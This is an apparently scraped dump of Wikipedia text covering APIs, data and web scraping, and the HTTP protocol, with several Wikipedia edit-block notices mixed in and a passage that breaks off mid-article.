been moving away from Simple Object Access Protocol (SOAP) based web services and service-oriented architecture (SOA) towards more direct representational state transfer (REST) style web resources and resource-oriented architecture (ROA). 32 Part of this trend is related to the Semantic Web movement toward Resource Description Framework (RDF), a concept to promote web-based ontology engineering technologies. Web APIs allow the combination of multiple APIs into new applications known as mashups. 33 In the social media space, web APIs have allowed web communities to facilitate sharing content and data between communities and applications. In this way, content that is created in one place dynamically can be posted and updated to multiple locations on the web. 34 For example, Twitter's REST API allows developers to access core Twitter data and the Search API provides methods for developers to interact with Twitter Search and trends data. 35 The design of an API has a significant impact on its usage. 5 First of all, the design of programming interfaces represents an important part of software architecture, the organization of a complex piece of software. 36 The principle of information hiding describes the role of programming interfaces as enabling modular programming by hiding the implementation details of the modules so that users of modules need not understand the complexities inside the modules. 37 Aside from the previous underlying principle, other metrics for measuring the usability of an API may include properties such as functional efficiency, overall correctness, and learnability for novices. 38 One straightforward and commonly adopted way of designing APIs is to follow Nielsen's heuristic evaluation guidelines. The Factory method pattern is also typical in designing APIs due to their reusable nature. 39 Thus, the design of an API attempts to provide only the tools a user would expect. 5 An application programming interface can be synchronous or asynchronous. A synchronous API call is a design pattern where the call site is blocked while waiting for the called code to finish. 40 With an asynchronous API call, however, the call site is not blocked while waiting for the called code to finish, and instead the calling thread is notified when the reply arrives. API security is very critical when developing a public facing API. Common threats include SQL injection, Denial-of-service attack (DoS), broken authentication, and exposing sensitive data. 41 Without ensuring proper security practices, bad actors can get access to information they should not have or even gain privileges to make changes to your server. Some common security practices include proper connection security using HTTPS, content security to mitigate data injection attacks, and requiring an API key to use your service. 42 Many public facing API services require you to use an assigned API key, and will refuse to serve data without sending the key with your request. 43 APIs are one of the more common ways technology companies integrate. Those that provide and use APIs are considered as being members of a business ecosystem. 44 The main policies for releasing an API are: 45 An important factor when an API becomes public is its "interface stability". Changes to the API—for example adding new parameters to a function call—could break compatibility with the clients that depend on that API. 49 When parts of a publicly presented API are subject to change and thus not stable, such parts of a particular API should be documented explicitly as "unstable". For example, in the Google Guava library, the parts that are considered unstable, and that might change soon, are marked with the Java annotation Beta. 50 A public API can sometimes declare parts of itself as deprecated or rescinded. This usually means that part of the API should be considered a candidate for being removed, or modified in a backward incompatible way. Therefore, these changes allow developers to transition away from parts of the API that will be removed or not supported in the future. 51 On February 19, 2020, Akamai published their annual "State of the Internet" report, showcasing the growing trend of cybercriminals targeting public API platforms at financial services worldwide. From December 2017 through November 2019, Akamai witnessed 85.42 billion credential violation attacks. About 20%, or 16.55 billion, were against hostnames defined as API endpoints. Of these, 473.5 million have targeted financial services sector organizations. 52 API documentation describes the services an API offers and how to use those services, aiming to cover everything a client would need to know for practical purposes. Documentation is crucial for the development and maintenance of applications using the API. 53 API documentation is traditionally found in documentation files but can also be found in social media such as blogs, forums, and Q A websites. 54 Traditional documentation files are often presented via a documentation system, such as Javadoc or Pydoc, that has a consistent appearance and structure. However, the types of content included in the documentation differ from API to API. 55 In the interest of clarity, API documentation may include a description of classes and methods in the API as well as "typical usage scenarios, code snippets, design rationales, performance discussions, and contracts", but implementation details of the API services themselves are usually omitted. Reference documentation for a REST API can be generated automatically from an OpenAPI document, which is a machine-readable text file that uses a prescribed format and syntax defined in the OpenAPI Specification. The OpenAPI document defines basic information such as the API's name and description, as well as describing operations the API provides access to. 56 API documentation can be enriched with metadata information like Java annotations. This metadata can be used by the compiler, tools, and by the run-time environment to implement custom behaviors or custom handling. 57 In 2010, Oracle Corporation sued Google for having distributed a new implementation of Java embedded in the Android operating system. 58 Google had not acquired any permission to reproduce the Java API, although permission had been given to the similar OpenJDK project. Google had approached Oracle to negotiate a license for their API, but were turned down due to trust issues. Despite the disagreement, Google chose to use Oracle's code anyway. Judge William Alsup ruled in the Oracle v. Google case that APIs cannot be copyrighted in the U.S and that a victory for Oracle would have widely expanded copyright protection to a "functional set of symbols" and allowed the copyrighting of simple software commands: To accept Oracle's claim would be to allow anyone to copyright one version of code to carry out a system of commands and thereby bar all others from writing its different versions to carry out all or part of the same commands. 59 60 Alsup's ruling was overturned in 2014 on appeal to the Court of Appeals for the Federal Circuit, though the question of whether such use of APIs constitutes fair use was left unresolved. 61 62 In 2016, following a two-week trial, a jury determined that Google's reimplementation of the Java API constituted fair use, but Oracle vowed to appeal the decision. 63 Oracle won on its appeal, with the Court of Appeals for the Federal Circuit ruling that Google's use of the APIs did not qualify for fair use. 64 In 2019, Google appealed to the Supreme Court of the United States over both the copyrightability and fair use rulings, and the Supreme Court granted review. 65 Due to the COVID 19 pandemic, the oral hearings in the case were delayed until October 2020. 66 The case was decided by the Supreme Court in Google's favor with a ruling of 6 2. Justice Stephen Breyer delivered the opinion of the court and at one point mentioned that "The declaring code is, if copyrightable at all, further than are most computer programs from the core of copyright. This means the code used in APIs are more similar to dictionaries than novels in terms of copyright protection. 67 |
690 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=4 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
691 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-10 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
692 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=11 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
693 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol | HTTP (Hypertext Transfer Protocol) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. 1 HTTP is the foundation of data communication for the World Wide Web, where hypertext documents include hyperlinks to other resources that the user can easily access, for example by a mouse click or by tapping the screen in a web browser. Development of HTTP was initiated by Tim Berners-Lee at CERN in 1989 and summarized in a simple document describing the behavior of a client and a server using the first HTTP version, named 0.9. 2 That version was subsequently developed, eventually becoming the public 1.0. 3 Development of early HTTP Requests for Comments (RFCs) started a few years later in a coordinated effort by the Internet Engineering Task Force (IETF) and the World Wide Web Consortium (W3C), with work later moving to the IETF. HTTP 1 was finalized and fully documented (as version 1.0) in 1996. 4 It evolved (as version 1.1) in 1997 and then its specifications were updated in 1999, 2014, and 2022. 5 Its secure variant named HTTPS is used by more than 85% of websites. 6 HTTP 2, published in 2015, provides a more efficient expression of HTTP's semantics "on the wire". As of August 2024, update it is supported by 66.2% of websites 7 8 (35.3% HTTP 2 30.9% HTTP 3 with backwards compatibility) and supported by almost all web browsers (over 98% of users). 9 It is also supported by major web servers over Transport Layer Security (TLS) using an Application-Layer Protocol Negotiation (ALPN) extension 10 where TLS 1.2 or newer is required. 11 12 HTTP 3, the successor to HTTP 2, was published in 2022. 13 As of February 2024, update it is now used on 30.9% of websites 14 and is supported by most web browsers, i.e. (at least partially) supported by 97% of users. 15 HTTP 3 uses QUIC instead of TCP for the underlying transport protocol. Like HTTP 2, it does not obsolesce previous major versions of the protocol. Support for HTTP 3 was added to Cloudflare and Google Chrome first, 16 17 and is also enabled in Firefox. 18 HTTP 3 has lower latency for real-world web pages, if enabled on the server, and loads faster than with HTTP 2, in some cases over three times faster than HTTP 1.1 (which is still commonly only enabled). 19 HTTP functions as a request response protocol in the client server model. A web browser, for example, may be the client whereas a process, named web server, running on a computer hosting one or more websites may be the server. The client submits an HTTP request message to the server. The server, which provides resources such as HTML files and other content or performs other functions on behalf of the client, returns a response message to the client. The response contains completion status information about the request and may also contain requested content in its message body. A web browser is an example of a user agent (UA). Other types of user agent include the indexing software used by search providers (web crawlers), voice browsers, mobile apps, and other software that accesses, consumes, or displays web content. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. High-traffic websites often benefit from web cache servers that deliver content on behalf of upstream servers to improve response time. Web browsers cache previously accessed web resources and reuse them, whenever possible, to reduce network traffic. HTTP proxy servers at private network boundaries can facilitate communication for clients without a globally routable address, by relaying messages with external servers. To allow intermediate HTTP nodes (proxy servers, web caches, etc.) to accomplish their functions, some of the HTTP headers (found in HTTP requests responses) are managed hop-by-hop whereas other HTTP headers are managed end-to-end (managed only by the source client and by the target web server). HTTP is an application layer protocol designed within the framework of the Internet protocol suite. Its definition presumes an underlying and reliable transport layer protocol. 20 In the latest version HTTP 3, the Transmission Control Protocol (TCP) is no longer used, but the older versions are still more used and they most commonly use TCP. They have also been adapted to use unreliable protocols such as the User Datagram Protocol (UDP), which HTTP 3 also (indirectly) always builds on, for example in HTTPU and Simple Service Discovery Protocol (SSDP). HTTP resources are identified and located on the network by Uniform Resource Locators (URLs), using the Uniform Resource Identifiers (URI's) schemes http and https. As defined in RFC 3986, URIs are encoded as hyperlinks in HTML documents, so as to form interlinked hypertext documents. In HTTP 1.0 a separate TCP connection to the same server is made for every resource request. 21 In HTTP 1.1 instead a TCP connection can be reused to make multiple resource requests (i.e. of HTML pages, frames, images, scripts, stylesheets, etc.). 22 23 HTTP 1.1 communications therefore experience less latency as the establishment of TCP connections presents considerable overhead, especially under high traffic conditions. 24 HTTP 2 is a revision of previous HTTP 1.1 in order to maintain the same client server model and the same protocol methods but with these differences in order: HTTP 2 communications therefore experience much less latency and, in most cases, even higher speeds than HTTP 1.1 communications. HTTP 3 is a revision of previous HTTP 2 in order to use QUIC UDP transport protocols instead of TCP. Before that version, TCP IP connections were used; but now, only the IP layer is used (which UDP, like TCP, builds on). This slightly improves the average speed of communications and to avoid the occasional (very rare) problem of TCP connection congestion that can temporarily block or slow down the data flow of all its streams (another form of "head of line blocking"). The term hypertext was coined by Ted Nelson in 1965 in the Xanadu Project, which was in turn inspired by Vannevar Bush's 1930s vision of the microfilm-based information retrieval and management "memex" system described in his 1945 essay "As We May Think". Tim Berners-Lee and his team at CERN are credited with inventing the original HTTP, along with HTML and the associated technology for a web server and a client user interface called web browser. Berners-Lee designed HTTP in order to help with the adoption of his other idea: the "WorldWideWeb" project, which was first proposed in 1989, now known as the World Wide Web. The first web server went live in 1990. 26 27 The protocol used had only one method, namely GET, which would request a page from a server. 28 The response from the server was always an HTML page. 2 In 1991, the first documented official version of HTTP was written as a plain document, less than 700 words long, and this version was named HTTP 0.9, which supported only GET method, allowing clients to only retrieve HTML documents from the server, but not supporting any other file formats or information upload. 2 Since 1992, a new document was written to specify the evolution of the basic protocol towards its next full version. It supported both the simple request method of the 0.9 version and the full GET request that included the client HTTP version. This was the first of the many unofficial HTTP 1.0 drafts that preceded the final work on HTTP 1.0. 3 After having decided that new features of HTTP protocol were required and that they had to be fully documented as official RFCs, in early 1995 the HTTP Working Group (HTTP WG, led by Dave Raggett) was constituted with the aim to standardize and expand the protocol with extended operations, extended negotiation, richer meta-information, tied with a security protocol which became more efficient by adding additional methods and header fields. 29 30 The HTTP WG planned to revise and publish new versions of the protocol as HTTP 1.0 and HTTP 1.1 within 1995, but, because of the many revisions, that timeline lasted much more than one year. 31 The HTTP WG planned also to specify a far future version of HTTP called HTTP-NG (HTTP Next Generation) that would have solved all remaining problems, of previous versions, related to performances, low latency responses, etc. but this work started only a few years later and it was never completed. In May 1996, RFC 1945 was published as a final HTTP 1.0 revision of what had been used in previous 4 years as a pre-standard HTTP 1.0 draft which was already used by many web browsers and web servers. In early 1996 developers started to even include unofficial extensions of the HTTP 1.0 protocol (i.e. keep-alive connections, etc.) into their products by using drafts of the upcoming HTTP 1.1 specifications. 32 Since early 1996, major web browsers and web server developers also started to implement new features specified by pre-standard HTTP 1.1 drafts specifications. End-user adoption of the new versions of browsers and servers was rapid. In March 1996, one web hosting company reported that over 40% of browsers in use on the Internet used the new HTTP 1.1 header "Host" to enable virtual hosting, and that by June 1996, 65% of all browsers accessing their servers were pre-standard HTTP 1.1 compliant. 33 In January 1997, RFC 2068 was officially released as HTTP 1.1 specifications. In June 1999, RFC 2616 was released to include all improvements and updates based on previous (obsolete) HTTP 1.1 specifications. Resuming the old 1995 plan of previous HTTP Working Group, in 1997 an HTTP-NG Working Group was formed to develop a new HTTP protocol named HTTP-NG (HTTP New Generation). A few proposals drafts were produced for the new protocol to use multiplexing of HTTP transactions inside a single TCP IP connection, but in 1999, the group stopped its activity passing the technical problems to IETF. 34 In 2007, the IETF HTTP Working Group (HTTP WG bis or HTTPbis) was restarted firstly to revise and clarify previous HTTP 1.1 specifications and secondly to write and refine future HTTP 2 specifications (named httpbis). 35 36 In 2009, Google, a private company, announced that it had developed and tested a new HTTP binary protocol named SPDY. The implicit aim was to greatly speed up web traffic (specially between future web browsers and its servers). SPDY was indeed much faster than HTTP 1.1 in many tests and so it was quickly adopted by Chromium and then by other major web browsers. 37 Some of the ideas about multiplexing HTTP streams over a single TCP IP connection were taken from various sources, including the work of W3C HTTP-NG Working Group. In January March 2012, HTTP Working Group (HTTPbis) announced the need to start to focus on a new HTTP 2 protocol (while finishing the revision of HTTP 1.1 specifications), maybe taking in consideration ideas and work done for SPDY. 38 39 After a few months about what to do to develop a new version of HTTP, it was decided to derive it from SPDY. 40 In May 2015, HTTP 2 was published as RFC 7540 and quickly adopted by all web browsers already supporting SPDY and more slowly by web servers. In June 2014, the HTTP Working Group released an updated six-part HTTP 1.1 specification obsoleting RFC 2616: In RFC 7230 Appendix-A, HTTP 0.9 was deprecated for servers supporting HTTP 1.1 version (and higher): 41 Since HTTP 0.9 did not support header fields in a request, there is no mechanism for it to support name-based virtual hosts (selection of resource by inspection of the Host header field). Any server that implements name-based virtual hosts ought to disable support for HTTP 0.9. Most requests that appear to be HTTP 0.9 are, in fact, badly constructed HTTP 1.x requests caused by a client failing to properly encode the request-target. Since 2016 many product managers and developers of user agents (browsers, etc.) and web servers have begun planning to gradually deprecate and dismiss support for HTTP 0.9 protocol, mainly for the following reasons: 42 note 2 In 2020, the first drafts HTTP 3 were published and major web browsers and web servers started to adopt it. On 6 June 2022, IETF standardized HTTP 3 as RFC 9114. 43 In June 2022, a batch of RFCs was published, deprecating many of the previous documents and introducing a few minor changes and a refactoring of HTTP semantics description into a separate document. HTTP is a stateless application-level protocol and it requires a reliable network transport connection to exchange data between client and server. 20 In HTTP implementations, TCP IP connections are used using well-known ports (typically port 80 if the connection is unencrypted or port 443 if the connection is encrypted, see also List of TCP and UDP port numbers). 44 45 In HTTP 2, a TCP IP connection plus multiple protocol channels are used. In HTTP 3, the application transport protocol QUIC over UDP is used. Data is exchanged through a sequence of request response messages which are exchanged by a session layer transport connection. 20 An HTTP client initially tries to connect to a server establishing a connection (real or virtual). An HTTP(S) server listening on that port accepts the connection and then waits for a client's request message. The client sends its HTTP request message. Upon receiving the request the server sends back an HTTP response message, which includes header(s) plus a body if it is required. The body of this response message is typically the requested resource, although an error message or other information may also be returned. At any time (for many reasons) client or server can close the connection. Closing a connection is usually advertised in advance by using one or more HTTP headers in the last request response message sent to server or client. 22 In HTTP 0.9, the TCP IP connection is always closed after server response has been sent, so it is never persistent. In HTTP 1.0, as stated in RFC 1945, the TCP IP connection should always be closed by server after a response has been sent. note 3 In HTTP 1.1 a keep-alive-mechanism was officially introduced so that a connection could be reused for more than one request response. Such persistent connections reduce request latency perceptibly because the client does not need to re-negotiate the TCP 3 Way-Handshake connection after the first request has been sent. Another positive side effect is that, in general, the connection becomes faster with time due to TCP's slow-start-mechanism. HTTP 1.1 added also HTTP pipelining in order to further reduce lag time when using persistent connections by allowing clients to send multiple requests before waiting for each response. This optimization was never considered really safe because a few web servers and many proxy servers, specially transparent proxy servers placed in Internet Intranets between clients and servers, did not handle pipelined requests properly (they served only the first request discarding the others, they closed the connection because they saw more data after the first request or some proxies even returned responses out of order etc.). Because of this, only HEAD and some GET requests (i.e. limited to real file requests and so with URLs without query string used as a command, etc.) could be pipelined in a safe and idempotent mode. After many years of struggling with the problems introduced by enabling pipelining, this feature was first disabled and then removed from most browsers also because of the announced adoption of HTTP 2. HTTP 2 extended the usage of persistent connections by multiplexing many concurrent requests responses through a single TCP IP connection. HTTP 3 does not use TCP IP connections but QUIC UDP (see also: technical overview). HTTP provides multiple authentication schemes such as basic access authentication and digest access authentication which operate via a challenge response mechanism whereby the server identifies and issues a challenge before serving the requested content. HTTP provides a general framework for access control and authentication, via an extensible set of challenge response authentication schemes, which can be used by a server to challenge a client request and by a client to provide authentication information. 1 The authentication mechanisms described above belong to the HTTP protocol and are managed by client and server HTTP software (if configured to require authentication before allowing client access to one or more web resources), and not by the web applications using a web application session. The HTTP Authentication specification also provides an arbitrary, implementation-specific construct for further dividing resources common to a given root URI. The realm value string, if present, is combined with the canonical root URI to form the protection space component of the challenge. This in effect allows the server to define separate authentication scopes under one root URI. 1 HTTP is a stateless protocol. A stateless protocol does not require the web server to retain information or status about each user for the duration of multiple requests. Some web applications need to manage user sessions, so they implement states, or server side sessions, using for instance HTTP cookies 46 or hidden variables within web forms. To start an application user session, an interactive authentication via web application login must be performed. To stop a user session a logout operation must be requested by user. These kind of operations do not use HTTP authentication but a custom managed web application authentication. Request messages are sent by a client to a target server. note 4 A client sends request messages to the server, which consist of: 47 In the HTTP 1.1 protocol, all header fields except Host: hostname are optional. A request line containing only the path name is accepted by servers to maintain compatibility with HTTP clients before the HTTP 1.0 specification in RFC 1945. 48 HTTP defines methods (sometimes referred to as verbs, but nowhere in the specification does it mention verb) to indicate the desired action to be performed on the identified resource. What this resource represents, whether pre-existing data or data that is generated dynamically, depends on the implementation of the server. Often, the resource corresponds to a file or the output of an executable residing on the server. The HTTP 1.0 specification 49 defined the GET, HEAD, and POST methods as well as listing the PUT, DELETE, LINK and UNLINK methods under additional methods. However, the HTTP 1.1 specification 50 formally defined and added five new methods: PUT, DELETE, CONNECT, OPTIONS, and TRACE. Any client can use any method and the server can be configured to support any combination of methods. If a method is unknown to an intermediate, it will be treated as an unsafe and non-idempotent method. There is no limit to the number of methods that can be defined, which allows for future methods to be specified without breaking existing infrastructure. For example, WebDAV defined seven new methods and RFC 5789 specified the PATCH method. Method names are case sensitive. 51 52 This is in contrast to HTTP header field names which are case-insensitive. 53 All general-purpose web servers are required to implement at least the GET and HEAD methods, and all other methods are considered optional by the specification. 52 A request method is safe if a request with that method has no intended effect on the server. The methods GET, HEAD, OPTIONS, and TRACE are defined as safe. In other words, safe methods are intended to be read-only. Safe methods can still have side effects not seen by the client, such as appending request information to a log file or charging an advertising account. In contrast, the methods POST, PUT, DELETE, CONNECT, and PATCH are not safe. They may modify the state of the server or have other effects such as sending an email. Such methods are therefore not usually used by conforming web robots or web crawlers; some that do not conform tend to make requests without regard to context or consequences. Despite the prescribed safety of GET requests, in practice their handling by the server is not technically limited in any way. Careless or deliberately irregular programming can allow GET requests to cause non-trivial changes on the server. This is discouraged because of the problems which can occur when web caching, search engines, and other automated agents make unintended changes on the server. For example, a website might allow deletion of a resource through a URL such as https: example.com article 1234 delete, which, if arbitrarily fetched, even using GET, would simply delete the article. 60 A properly coded website would require a DELETE or POST method for this action, which non-malicious bots would not make. One example of this occurring in practice was during the short-lived Google Web Accelerator beta, which prefetched arbitrary URLs on the page a user was viewing, causing records to be automatically altered or deleted en masse. The beta was suspended only weeks after its first release, following widespread criticism. 61 60 A request method is idempotent if multiple identical requests with that method have the same effect as a single such request. The methods PUT and DELETE, and safe methods are defined as idempotent. Safe methods are trivially idempotent, since they are intended to have no effect on the server whatsoever; the PUT and DELETE methods, meanwhile, are idempotent since successive identical requests will be ignored. A website might, for instance, set up a PUT endpoint to modify a user's recorded email address. If this endpoint is configured correctly, any requests which ask to change a user's email address to the same email address which is already recorded—e.g. duplicate requests following a successful request—will have no effect. Similarly, a request to DELETE a certain user will have no effect if that user has already been deleted. In contrast, the methods POST, CONNECT, and PATCH are not necessarily idempotent, and therefore sending an identical POST request multiple times may further modify the state of the server or have further effects, such as sending multiple emails. In some cases this is the desired effect, but in other cases it may occur accidentally. A user might, for example, inadvertently send multiple POST requests by clicking a button again if they were not given clear feedback that the first click was being processed. While web browsers may show alert dialog boxes to warn users in some cases where reloading a page may re-submit a POST request, it is generally up to the web application to handle cases where a POST request should not be submitted more than once. Note that whether or not a method is idempotent is not enforced by the protocol or web server. It is perfectly possible to write a web application in which (for example) a database insert or other non-idempotent action is triggered by a GET or other request. To do so against recommendations, however, may result in undesirable consequences, if a user agent assumes that repeating the same request is safe when it is not. A request method is cacheable if responses to requests with that method may be stored for future reuse. The methods GET, HEAD, and POST are defined as cacheable. In contrast, the methods PUT, DELETE, CONNECT, OPTIONS, TRACE, and PATCH are not cacheable. Request header fields allow the client to pass additional information beyond the request line, acting as request modifiers (similarly to the parameters of a procedure). They give information about the client, about the target resource, or about the expected handling of the request. A response message is sent by a server to a client as a reply to its former request message. note 4 A server sends response messages to the client, which consist of: 47 In HTTP 1.0 and since, the first line of the HTTP response is called the status line and includes a numeric status code (such as "404") and a textual reason phrase (such as "Not Found"). The response status code is a three-digit integer code representing the result of the server's attempt to understand and satisfy the client's corresponding request. The way the client handles the response depends primarily on the status code, and secondarily on the other response header fields. Clients may not understand all registered status codes but they must understand their class (given by the first digit of the status code) and treat an unrecognized status code as being equivalent to the x00 status code of that class. The standard reason phrases are only recommendations, and can be replaced with "local equivalents" at the web developer's discretion. If the status code indicated a problem, the user agent might display the reason phrase to the user to provide further information about the nature of the problem. The standard also allows the user agent to attempt to interpret the reason phrase, though this might be unwise since the standard explicitly specifies that status codes are machine-readable and reason phrases are human-readable. The first digit of the status code defines its class: The response header fields allow the server to pass additional information beyond the status line, acting as response modifiers. They give information about the server or about further access to the target resource or related resources. Each response header field has a defined meaning which can be further refined by the semantics of the request method or response status code. Below is a sample HTTP transaction between an HTTP 1.1 client and an HTTP 1.1 server running on www.example.com, port 80. note 5 note 6 A client request (consisting in this case of the request line and a few headers that can be reduced to only the "Host: hostname" header) is followed by a blank line, so that the request ends with a double end of line, each in the form of a carriage return followed by a line feed. The "Host: hostname" header value distinguishes between various DNS names sharing a single IP address, allowing name-based virtual hosting. While optional in HTTP 1.0, it is mandatory in HTTP 1.1. (A (slash) 